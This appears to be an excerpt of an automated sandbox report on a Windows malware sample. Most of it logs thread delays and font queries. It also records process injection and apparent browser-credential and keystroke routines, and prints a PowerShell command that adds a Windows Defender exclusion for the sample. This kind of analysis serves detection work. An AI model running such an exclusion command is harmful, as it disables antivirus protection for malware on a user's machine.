Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594219	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7012	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2690	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Window / User API: threadDelayed 1975	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Window / User API: threadDelayed 7858	Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7920	Thread sleep count: 1975 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7920	Thread sleep count: 7858 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598393s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596170s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -596040s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595917s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595783s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -594668s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -594453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -594344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe TID: 7916	Thread sleep time: -594219s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598651	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598544	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598393	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596170	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 596040	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595917	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595783	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594668	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Thread delayed: delay time: 594219	Jump to behavior

Source: 2Lzx7LMDWV.exe, 00000004.00000002.4144207729.0000000001006000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe"
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

Memory written: C:\Users\user\Desktop\2Lzx7LMDWV.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe"			Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Users\user\Desktop\2Lzx7LMDWV.exe "C:\Users\user\Desktop\2Lzx7LMDWV.exe"			Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Users\user\Desktop\2Lzx7LMDWV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
